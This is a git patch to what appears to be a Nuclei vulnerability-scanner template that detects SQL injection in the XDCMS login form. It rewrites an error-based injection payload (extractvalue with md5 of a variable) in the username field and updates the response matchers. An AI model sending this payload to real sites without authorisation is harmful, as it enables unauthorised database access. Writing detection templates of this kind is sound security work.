From d81a48e31e9dedc69ccc595ea73e916aaf439457 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 30 Jun 2022 08:48:00 +0530
Subject: [PATCH] Update xdcms-sqli.yaml

---
 vulnerabilities/other/xdcms-sqli.yaml | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/vulnerabilities/other/xdcms-sqli.yaml b/vulnerabilities/other/xdcms-sqli.yaml
index aff7f9d904..d2b077214b 100644
--- a/vulnerabilities/other/xdcms-sqli.yaml
+++ b/vulnerabilities/other/xdcms-sqli.yaml
@@ -8,6 +8,9 @@ info:
     - https://www.uedbox.com/post/35188/
   tags: sqli,xdcms
 
+variables:
+  num: "999999999"
+
 requests:
   - method: POST
     path:
@@ -15,7 +18,7 @@ requests:
     headers:
       Content-Type: application/x-www-form-urlencoded
     body: |
-      username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+
+      username=dd' or extractvalue(0x0a,concat(0x0a,md5({{num}})))#&password=dd&submit=+%B5%C7+%C2%BC+
 
     matchers-condition: and
     matchers:
@@ -27,10 +30,8 @@ requests:
 
       - type: word
         words:
-          - "707564257851522176"
-          - "XPATH syntax error:"
+          - '{{md5({{num}})}}'
         part: body
-        condition: and
 
       - type: status
         status: